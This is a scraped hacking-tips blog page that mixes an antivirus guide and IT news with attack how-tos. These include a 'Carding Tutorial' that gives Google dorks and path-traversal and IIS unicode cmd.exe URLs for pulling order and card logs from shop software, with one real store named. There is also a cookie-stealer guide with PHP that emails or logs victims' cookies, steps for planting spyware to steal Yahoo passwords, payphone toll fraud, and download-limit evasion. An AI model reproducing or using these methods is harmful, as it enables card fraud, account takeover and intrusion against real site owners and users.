// ----------------------------------------------------------------------------------------------//
RSS

Caught A Virus?

If you've let your guard down--or even if you haven't--it can be hard to tell if your PC is infected. Here's what to do if you suspect the worst.

Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you'll lose all your data, and you'll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.

You know they're right. Yet for one reason or another, you're not running antivirus software, or you are but it's not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you've put off renewing.

It happens. It's nothing to be ashamed of. But chances are, either you're infected right now, as we speak, or you will be very soon.

For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, "an unprotected [Windows] computer will become owned by a bot within 14 minutes."

Today's viruses, worms, and so-called bots--which turn your PC into a zombie that does the hacker's bidding (such as mass-mailing spam)--aren't going to announce their presence. Real viruses aren't like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you're not well protected.

Is Your PC "Owned?"

I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program's presence. People who write commercial software put icons all over your desktop. Who's going to work harder to go unnoticed?

Other indicators that may, in fact, indicate that there's nothing that you need to worry about, include:

* An automated e-mail telling you that you're sending out infected mail. E-mail viruses and worms typically come from faked addresses.
* A frantic note from a friend saying they've been infected, and therefore so have you. This is likely a hoax. It's especially suspicious if the note tells you the virus can't be detected but you can get rid of it by deleting one simple file. Don't be fooled--and don't delete that file.

I'm not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.

Sniffing Out an Infection

There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you're not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.

To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check "Show icon in notification area when connected," and click OK.

If you're interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you'll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.

Want another place to look? In Windows XP, click Start, Run, type "services.msc" in the box, and press Enter. You'll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.

Finally, you can do more detective work by selecting Start, Run, and typing "msconfig" in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.

If any of these tools won't run--or if your security software won't run--that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.

What to Do Next

Once you're fairly sure your system is infected, don't panic. There are steps you can take to assess the damage, depending on your current level of protection.

* If you don't have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There's McAfee FreeScan, Symantec Security Check, and Trend Micro's HouseCall. If one doesn't find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you're done, buy or download a real antivirus program.
* If you have antivirus software, but it isn't active, get offline, unplug wires-- whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.
* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses--if manual removal is possible--or a free removal tool if it isn't. Check out GriSOFT's Virus Encyclopedia, Eset's Virus Descriptions, McAffee's Virus Glossary, Symantec's Virus Encyclopedia, or Trend Micro's Virus Encyclopedia.

A Microgram of Prevention

Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer's security is far more effective than cleaning up the mess afterwards. Start with a good security program, such Trend Micro's PC-Cillin, which you can buy for $50.

Don't want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).

Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn't worth your money or your time.

Speaking of updating, the same goes for Windows. Use Windows Update (it's right there on your Start Menu) to make sure you're getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say "Service Pack 2."

Here are a few more pointers for a virus-free life:

* Be careful with e-mail. Set your e-mail software security settings to high. Don't open messages with generic-sounding subjects that don't apply specifically to you from people you don't know. Don't open an attachment unless you're expecting it.
* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.
* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research's Web site and run the free ShieldsUP test to see your ports' status. If some ports show up as closed--or worse yet, open--check your router's documentation to find out how to hide them.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Bit Torrent Tutorials

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one
big chunk, you are able to download from many people at once, increasing your download speeds. There may be
100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly
share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanitory, its the date the torrent was added.
Name: Also self explanitory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Rapidshare TimeLimit

Directions
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server, a different IP address. You can do this one of multiple ways.

Requesting a new IP address from your ISP server.

Here's how to do it in windows:
1. Click Start
2. Click run
3. In the run box type cmd.exe and click OK
4. When the command prompt opens type the following. ENTER after each new line.


ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit


5. Erase your cookies in whatever browser you are using.
6. Try the rapidshare download again.
Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Download Mp3's Without Using Filesharing

http://www.mp3dimension.com/search/1/in/da/club/?dnsa=1
http://www.emp3s.com/dsong.aspx?id=51539&rID=X82psy]http://www.emp3s.com/dsong.aspx?id=51539&rID=X82psy
http://www.mp3-find.com/]http://www.mp3-find.com/
http://www.emp3world.com/]http://www.emp3world.com/
http://zoek.vinden.nl/?where=mp3&vid=l8020222738I1102894906&refer=resultonline&sess=a3a3a303&query=21+questions&x=0&y=0]http://zoek.vinden.nl/?where=mp3&vid=l8020...estions&x=0&y=0
http://www.maxalbums.com/]http://www.maxalbums.com/

This is the one wot i use to download MP3's
http://zoek.vinden.nl/?where=mp3&vid=l8020222738I1102894906&refer=resultonline&sess=a3a3a303&query=21+questions&x=0&y=0

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Make Free Phone Calls

Have you ever got stuck some ware and just about 6'ft away from you there is a pay phone, but yet you dont have any change(=( bummer) to call your famaly members or some one to come and pick you up(hehe that sux)?

Well im going to show you some thing that might get you arrested(shit now what) or it might get you home( now thats what im talking about!)its a chance that you have to take depends were are you.

Ok now before we go on let me let you know that this is not thateasy to do, but anyways lets start. A pay phone is not like a regular home phone. A pay phone runs through a diffrent amount of electricity and wires even the electricity flow is diffrent, Well anyways that is enoght of electrical talk lets get to the good part.

Ok to get free call's on a pay phone you will frist have to twist the phone wire just about 50 to 60 times then you will pull on the phonewire untill the metal part crackes off phone keep doing it if the metalpart is completely off the phone....
Now assuming that it is off you willsee a few colored wires in side the metal wire of the pay phone there should be a black, red, yellow one in side it and a really metallthick one in the middle(NOTE that some phone has diffrent colored wires)now the one wire that we are looking for is the black one. Now here ishow its done.. rip off the plastic of that wire(you can take it out with your teeth, you wont get electricuted =) hehe ).

Now assuming that you have taken apart the plastic off the wire(does not has to be all of it)now you will take that wire and aply it to the phone with the metal part of the phone touching the wire that you ripped off its plastic.. if you are aplying it correctly then you should here a static on the phone.. so make sure you have that phone on your ear.. now with the wire being aplyed to the phone(the metal part right next tothe buttons)Dial the number that you wish to call.. onces you hear it ringing then you can let go of the wire that you was applying.. and BINGO... say hello to mami and daddy for me =).. welp that is all enjoy your call.. ohh and by the wayyes this also comes with long distance hehe, and no! you can not use it to logg on to aol...

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Carding Tutorial

E-Commerce

1. Find target Website commerceSQL at google.com, with keyword :

allinurl:/commercesql/

2. For example we get target with url :

http://www.example.com/commercesql/blablabla

3. Replace the URL to be :

-> www.example.com/cgi-bin/commercesql/index.cgi?page=

4. Example to see admin config

-> www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl

5. Example to see admin manager

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi

6. To see file log/ccnya ->

http://www.example.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log

7. Done


PDShopro

1. Find target Website PDshopro at google.com, with keyword allinurl:/shop/category.asp/
catid=

2. First we have to watch the database configuration by replacing the URL to be: www.example.com/admin/dbsetup.asp

3. Target example : http://www.marktwainbooks.com/admin/dbsetup.asp

4. We will get the name of databese : sdatapdshoppro.mdb

5. Now to download sdatapdshoppro.mdb file, you can replace the URL to be : http:// www.marktwainbooks.com/data/pdshoppro.mdb

6. Open file .mdb- using Microsoft Access

7. Good luck !

Cart32

1. Find target at www.google.com with keyword allinurl:/cart32.exe/

2. For example we have target with url:
http://www.example.com/scripts/cart32.exe/blablabla

3. Replace that url to be -> http://www.example.com/scripts/

4. Modify that url with unicode at the end -> http://www.example.com/scripts/

5. example unicode for path /scripts/ : -->

/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\

For path path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\

6. for example, at that url using path /scripts/ than relace to be http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\

7. End string unicode with dir+c:\ It means we are on the directory c server target!

8. For enter to the directory replace cc's unicode with -> http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\

9. We will get ouput and listing form.32 file'w, for example :WRBURNS-001065.c32

10. For viewing the file with unicode http://www.example.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32

11. If it doesn't work, you have to try with another unicode.

nb: coba deh salah satu dari ketiga cara diatas... bila da yang berhasil, jangan disalah gunakan ya? atau aq bakal hapus semua ilmu hacking yang aq punya di blog ini....

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hack Rapidshare and all other file hosting websites

Universal Share Downloader (USDownloader), also called RapidShare downloader or MyTempDir downloader is actually not a crack or hack program. Instead, Universal Share Downloader is a download manager for automated download a list of files from most popular free uploaders or free unlimited upload files hosting servers such as RapidShare, MegaUpload, YouSendIt, FileFactory and etc.

Normally, if you’re not premium member or paid member or upgraded member of the free unlimited or one-click file hosting, web space and file delivery service, the service will has some limitations when you try to download the files from the server, such as no concurrent parallel download, so you have to download one file after another file has finished downloading. Beside, you’re also limited to certain download bandwidth limit based on time and IP address, download time delay (reserve “download ticket” system and no instant download start) and slower download speed.


AllFiles, Audiofind, Badongo, BestSharing, Come2Store, Datenko, DepositFiles, EasySharing, FileDepartment, FileFactory, FileHD, FileSpace, GetFileBiz, HemenPaylas, HyperUpload, iFolder, MegaShares, MegaUpload, MyTempDir, Quickdump, Rapidfile.fr, RapidShare, RapidUpload, RecFile, SaveFile, Sendmefile, SexUploader, ShareAm, SimpleUpload, Slil, SpbLand, StoreandServe, SupaShare, TurboShare, TurboUpload, UniversalVideo, Upfile, Upload2, Uploading, UploadPort, UploadSend, WebFile, WebFileHost, YourFile, YourFileHost, YourFileLink, YouSendIt and zShare

Note: For proxy servers list, you can download a software called GeoWhere and use GeoWhere to search for available proxy servers on the Internet, and put all the found proxies into a text file. You should use only anonymous proxy, as transparent proxy will reveal your IP address too. Alternatively, several websites has a long list of open public proxy servers that can be used by the USDownloader such as Proxy.6te.net, Proxy.org. Proxy List even allows you to download list of proxy servers in a text file format (remember to download only anonymous or elite proxy by searching for the type before downloading).

Best of all, Universal Share Downloader is a freeware, and no installation needed. Just download the Universal Share Downloader v 1.3.4 Beta 8 zip file , extract it and run the USDownloader.exe. The few limitation of Universal Share Downloader include unable to download normal download links (it works on those file sharing/hosting services only), and it itself yet to support parallel, concurrent and multi-threaded downloading in current (1.3.3) version (to enable it now, you have to launch multiple USDownloader.exe)

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hack Passwords in Firefox

Whenever you log in to a website using your username and password, you'll be prompted by Firefox whether you'd like Firefox to remember this password.

If you click on Remember, the next time you visit the website, it'll automatically enter the username and password for your convenience.

Now, back to the topic. Let's say you saved your GMail password in Firefox. After months or years gone by and you don't remember the password you set for my GMail. You started to panic and desperately need to get back your GMail password.

Don't worry, here's how you can find the hidden GMail password in Firefox.

Firefox is much better than Internet Explorer in terms of managing "remembered" logins. In Internet Explorer, there is no built-in feature where you can manage or view your saved login information. That's why you need third party tools to reveal the passwords hidden under asterisks. As for Firefox, you can access remembered passwords with a few clicks.

To view your remembered passwords in Firefox browser, go to Tools, and click on Options. Go to Security tab and click on the Show Passwords button. A remember password dialog box will appear. Click on the Show Passwords button again and a new col

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Kill Yahoo Chatroom ads

I found a simple Tweak to rid Yahoo Chat Room windows from those pesky ad banners... wish I could do the same for the huge ad when you first enter chat.

Create a new text document, copy and paste the following...

Windows Registry Editor Version 5.00 [HKEY_CURRENT_USER\Software\Yahoo\Pager\yurl]
"Finance Disclaimer"="http://msg.edit.yahoo.com/config/jlb"
"Chat Adurl"="http://chat.yahoo.com/c/msg/tabs.html?spaceid=21501837"

Doesn't matter what ya name it, as long as you change it from .txt to .reg. It works well with my Yahoo, should work the same for everyone eles as well. Happy Tweaking!

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to make cookies and hack Orkut accounts

How to Make a Cookie Stealer

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4


Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5


Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3


Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Hack Yahoo ID

It is the easiest way to hack anyone's Yahoo ID's Password.

Follow these steps to hack the Yahoo ID

1. U have to make a server {spyware} given ur email id.

2. Send the server to the victim's computer anyhow.

3. When he will open it he cant realize that it was a spyware because after opening it, it will be deleted automatically.

4. After open this file, when he will go to login int his yahoo id his password and id will be send to ur given yahoo email id .

5. U can also disable his OS's many features .

There are three types of software by which u can make your own spyware {server]
U can download anyone and use it.

How to make cookies and hack Orkut accounts

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

IT News

AMD introduces new Phenom chips

Advanced Micro Devices on Thursday announced new Phenom chips, including quad-core chips and its first triple-core processors for desktop PCs.
The company's triple-core Phenom X3 8000 series processors provide an option to mainstream PC buyers who don't want to spend on a quad-core processor but are looking for more performance than a dual-core processor, said Pat Moorhead, vice president of advanced marketing at AMD.

The chips could be used for high-definition video playback, casual mainstream gaming and productivity applications, Moorhead said.

[ InfoWorld chief technologist Tom Yager believes that AMD is ready to scale you up. ]

The company's first triple-core processors include the Phenom X3 8400, which runs at 2.1GHz, and the Phenom X3 8600, which runs at 2.3GHz. Both will come with 1.5MB of L2 cache and 2MB of L3 cache.

AMD also launched three Phenom quad-core processors on Thursday: the Phenom X4 9750, which runs at 2.4Ghz; the Phenom X4 9850, which runs at 2.5GHz; and the Phenom 9100e, a low-voltage quad-core processor that runs at 1.8GHz and has a 65-watt power envelope during maximum usage. All the processors contain 2MB of L2 cache and 2MB of L3 cache.

PC makers will ship products with the quad-core processors in the second quarter, AMD said.

The triple-core processors are already shipping in volume to PC makers, AMD said. U.S. vendor ZT Systems will list PCs with the new triple-core Phenoms on Monday, with other "major OEMs" and system vendors shipping products next quarter, AMD said. Many major vendors, including Dell and Hewlett-Packard, have already hinted at including the processors in desktops.

Dell has listed plans to use the chip in its OptiPlex 740 business desktop systems. It will ship the triple-core OptiPlex in the second quarter, a company spokeswoman recently said, but she declined to specify which processor will run the desktop. Hewlett-Packard has also listed a desktop on its Bulgarian-language Web site with AMD's Phenom Triple-Core 8600B processor.

Mesh Computer, a PC vendor in the United Kingdom, is offering the Matrix XXX Plus desktop with the Phenom X3 8400 processor and the Matrix XXX Pro desktop with the Phenom 8600 processor.

Because the triple-core chip is a new concept -- set between the widely accepted dual- and quad-cores -- it's unclear how it will fit in the market, said Dean McCarron, founder and principal at Mercury Research.

"You're going to get a performance enhancement with the extra core above and beyond a dual-core," McCarron said. But it also falls shy of a quad-core.

AMD designed the triple-core as a way to produce a cheaper chip. The triple-core processor is built on a quad-core CPU, with one core nonfunctional, McCarron said.

The triple-core chip gives AMD a tactical advantage over Intel, McCarron said. Intel will need to answer the triple-core chip with a product priced in the same range while delivering similar performance. Intel can take a dual-core or quad-core processor, adjust features like cache, and price it similar to AMD's triple-core processor, McCarron said.

Apple releases iPhone SDK beta 2

Apple released on Thursday a new version of its iPhone SDK for developers. iPhone SDK beta 2 includes Interface Builder, a component of Apple's development tools that lets developers create the interface for their applications.

That seems to be the only major change in the latest build, according to the SDK's read me, which continues to list some known issues. Apple says "this second beta is known to be incompatible with installation folders other than the default /Developer."

Given the importance of UI on the Mac, Interface Builder is a pretty critical tool in the development process, and some developers had chosen to hold off on their efforts until the SDK was revised.

Apple unveiled the iPhone SDK at a special event earlier this month, allowing developers to begin building applications for the iPhone and iPod touch. Several high-profile companies have already jumped onboard, demoing their applications at the event.

Highlighting the demos was AOL with a native AIM client; other applications from Electronic Arts, Salesforce, and Apple were also shown.


Gone in 2 minutes: Mac gets hacked first in contest

It may be the quickest $10,000 Charlie Miller ever earned. He took the first of three laptop computers -- and a $10,000 cash prize -- Thursday after breaking into a MacBook Air at the CanSecWest security conference's PWN 2 OWN hacking contest.

Show organizers offered a Sony Vaio, Fujitsu U810, and the MacBook as prizes, saying that they could be won by anybody at the show who could find a way to hack into each of them and read the contents of a file on the system using a previously undisclosed "0day" attack.

Nobody was able to hack into the systems on the first day of the contest when contestants were only allowed to attack the computers over the network, but on Thursday, the rules were relaxed so that attackers could direct contest organizers using the computers to do things like visit Web sites or open e-mail messages.

Miller, best known as one of the researchers who first hacked Apple's iPhone last year, didn't take much time. Within 2 minutes, he directed the contest's organizers to visit a Web site that contained his exploit code, which then allowed him to seize control of the computer, as about 20 onlookers cheered him on.

He was the first contestant to attempt an attack on any of the systems.

Miller was quickly given a nondisclosure agreement to sign, and he's not allowed to discuss particulars of his bug until the contest's sponsor, TippingPoint, can notify the vendor.

Contest rules state that Miller could only take advantage of software that was preinstalled on the Mac, so the flaw he exploited must have been accessible by, or possibly inside, Apple's Safari browser.

Last year's contest winner, Dino Dai Zovi, exploited a vulnerability in QuickTime to take home the prize.

Dai Zovi, who congratulated Miller after his hack, didn't participate in this year's contest, saying it was time for someone else to win.

Multi-core to leave developers in dust?

Multi-core chip rivals AMD and Intel have been beating their chests as of late, but to what end, I wonder, as developers labor to keep up.

AMD, for one, has fixed the embarrassing flaw that delayed the quad-core Barcelona chip. As Terry Malloy put it in On the Waterfront, so what?

Meanwhile, Intel and Microsoft pat themselves on the back because they've donated $20 million to UC Berkley and the University of Illinois to found the Universal Parallel Computing Research Centers. Well, it's about time.

Why so negative? The dirty little secret (and it's not all that secret) is that the gap between hardware and software has never been greater. Today's software can barely (if at all) take advantage of quad-core processors, but Intel and AMD seem to be giddy with rivalry, rushing to push out chips with even more cores. Intel has already demonstrated an 80-core processor, and you can expect x86 servers with as many as 64 processor cores in 2009 and desktops with that many by 2012, says Forrester analyst James Staten.

That's not to say that the IT industry is scoffing at the potential benefits of multi-core processing. But the mountain between IT and some future multi-core promise land -- namely, the task of developing parallelized apps that keep pace with continual core advances -- is huge, says David Patterson, the Pardee Professor of Computing Science at UC Berkeley and director of the parallel computing lab. "It's the biggest challenge in 50 years of computing. If we do this, it's a chance to reset the foundation of computing."

In the short run, Patterson says, we can parallelize legacy software and gamble on getting value out of eight cores. But that would be only an interim solution, as such apps would not scale to 32 or 64 cores, he adds.

What is frustrating is that this problem didn't exactly sneak up on the industry. Chip development cycles are very long, and key software developers are well aware of what's moving through the pipeline. Sure, software always lags hardware. Many of us complained that we didn't have software that would take advantage of 500MHz back in the '90s. But what Patterson and others call the multi-core revolution poses problems for developers that are qualitatively different than the problems of the past. Why wait so long to get serious about solving them?

Making sense of the multi-core muddle

The cynical explanation for this growing gap is that Intel and AMD are running on a treadmill that requires selling more and more transistors to support the cost of developing and building fabs. As long as buyers are willing to spend the money for cool new hardware, who cares if they don't really need it?

Ray DePaul, president and CEO of RapidMind, which sells a multi-core software development platform, has a different take.

"The first multi-core chips were dual core, and that lulled everyone into thinking this is OK," DePaul says.

Taking advantage of the second core was relatively easy with existing software. But four cores is another story.

"It's the classic disruptive technology," DePaul says. "If the Microsofts and the Intels always got it right, you'd never see a Google or an AMD."

RapidMind hopes to avoid following in the wake of companies such as Thinking Machines and nCUBE, which attempted to build businesses around solving the parallel computing problem without success. I'm not qualified to say whether the RapidMind solution, which includes an embedded API to allow legacy software to take advantage of multiple cores, is viable. But I agree with DePaul when he says, "The business opportunity is far more mainstream than it was because every desktop is shipped with a multi-core processor."

RapidMind spun out of the University of Waterloo in Ontario, where co-founder Michael McCool studied the problems of parallel computing for years. A one-time competitor called PeakStream was purchased by Google last year. It's unclear what the search giant intends to do with the technology, though it may well use it internally to bolster its already enormous computing resources.

In addition to the business opportunity, there's an employment opportunity here as well. Developers who can handle parallel processing or concurrent processing are going to be in great demand. Indeed, UC's Patterson says: "We feel a sense of allegiance to our undergrads but don't know what to teach them. Course work is all focused on sequential [programming] problems."

I don't feel like doing the math, but I'll bet Intel and Microsoft earn $20 million in a matter of hours. So, yeah, I congratulate them for funding some research, but they and other industry heavyweights need to do a lot more. If not, maybe we'll wise up and stop buying what they're selling.

The death of the silicon computer chip

The reign of the silicon chip is over, according to physicists who predict that the conventional silicon chip has no longer than four years left to run.

Meeting at the Institute of Physics’ Condensed Matter and Material Physics conference this week, researchers speculate that the silicon chip will be unable to sustain the same pace of increase in computing power and speed as it has in previous years.

Just as Gordon Moore predicted in 2005, physical limitations of the miniaturised electronic devices of today will eventually lead to silicon chips that are saturated with transistors and incapable of holding any more digital information.

Scientists are now investigating alternative components that may pave the way to faster, more powerful computers of the future and potentially extend Moore’s Law of technological advancement.

One team of researchers at the Leeds University in the UK have proposed to replace silicon chips with carbon nanotubes, which are electrically-conducive tubes of pure carbon that are tens of times thinner than a human hair.

